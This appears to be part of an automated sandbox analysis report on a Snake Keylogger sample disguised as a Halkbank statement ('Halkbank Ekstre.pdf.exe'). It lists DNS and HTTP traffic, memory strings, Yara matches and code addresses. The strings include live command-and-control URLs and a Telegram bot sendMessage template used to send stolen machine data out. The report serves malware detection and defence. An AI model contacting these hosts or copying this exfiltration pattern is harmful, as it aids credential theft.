Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: kashmirestore.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 21 Jan 2025 15:44:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 21 Jan 2025 15:44:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000034D6000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kashmirestore.com
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 0000000A.00000002.1536608429.0000000003240000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1424810584.0000000002A5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameH&w
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20a
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000033DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.000000000342E000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.000000000326E000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000032DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.000000000326E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000032DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003455000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.000000000342E000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003303000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003298000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.00000000032DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.0000000004611000.00000004.00000800.00020000.00000000.sdmp, Halkbank Ekstre.pdf.exe, 00000009.00000002.2621942141.000000000462D000.00000004.00000800.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.0000000004241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2615043055.0000000003410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49915 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Halkbank Ekstre.pdf.exe

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_06A95AA8	0_2_06A95AA8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_025C4668	0_2_025C4668
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_025C3E30	0_2_025C3E30
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_025C4658	0_2_025C4658
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_025C92A8	0_2_025C92A8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BC147	9_2_017BC147
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BA088	9_2_017BA088
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B5362	9_2_017B5362
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BD278	9_2_017BD278
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BC468	9_2_017BC468
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BC738	9_2_017BC738
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B69A0	9_2_017B69A0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BE988	9_2_017BE988
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BCA08	9_2_017BCA08
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BCCD8	9_2_017BCCD8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B6FC8	9_2_017B6FC8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BCFAC	9_2_017BCFAC
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B3E09	9_2_017B3E09
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BE97C	9_2_017BE97C
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017BF961	9_2_017BF961
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B29EC	9_2_017B29EC
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B3B87	9_2_017B3B87
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_017B3AA1	9_2_017B3AA1
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF1E80	9_2_06FF1E80
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF17A0	9_2_06FF17A0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFFC68	9_2_06FFFC68
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF9C18	9_2_06FF9C18
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF9548	9_2_06FF9548
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF0B30	9_2_06FF0B30
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF5028	9_2_06FF5028
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF2968	9_2_06FF2968
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFE6B0	9_2_06FFE6B0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFE6AF	9_2_06FFE6AF
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF1E70	9_2_06FF1E70
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFDE00	9_2_06FFDE00
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF178F	9_2_06FF178F
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFEF60	9_2_06FFEF60
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFEF51	9_2_06FFEF51
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFCCA0	9_2_06FFCCA0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFDDFF	9_2_06FFDDFF
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFD550	9_2_06FFD550
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFD540	9_2_06FFD540
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFEAF8	9_2_06FFEAF8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFE258	9_2_06FFE258
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFE249	9_2_06FFE249
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFF3B8	9_2_06FFF3B8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF8BA0	9_2_06FF8BA0
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF0B20	9_2_06FF0B20
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFEB08	9_2_06FFEB08
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFD0F8	9_2_06FFD0F8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF0040	9_2_06FF0040
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF0028	9_2_06FF0028
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF5018	9_2_06FF5018
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFF810	9_2_06FFF810
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFF801	9_2_06FFF801
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFD9A8	9_2_06FFD9A8
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FFD999	9_2_06FFD999
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_01204668	10_2_01204668
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_01203E30	10_2_01203E30
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_01204658	10_2_01204658
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_012092A8	10_2_012092A8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B65D8	10_2_059B65D8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BB4E0	10_2_059BB4E0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BB0A0	10_2_059BB0A0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BCD18	10_2_059BCD18
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B6D40	10_2_059B6D40
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BBC50	10_2_059BBC50
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BDBB0	10_2_059BDBB0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B5AA8	10_2_059B5AA8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B7AF8	10_2_059B7AF8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B7588	10_2_059B7588
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B65B9	10_2_059B65B9
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BD5B8	10_2_059BD5B8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BD5C8	10_2_059BD5C8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BC548	10_2_059BC548
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B7578	10_2_059B7578
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BB4D1	10_2_059BB4D1
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B97D0	10_2_059B97D0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B97C2	10_2_059B97C2
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BB719	10_2_059BB719
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BB728	10_2_059BB728
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BC098	10_2_059BC098
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BB091	10_2_059BB091
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BC088	10_2_059BC088
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BA380	10_2_059BA380
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BA370	10_2_059BA370
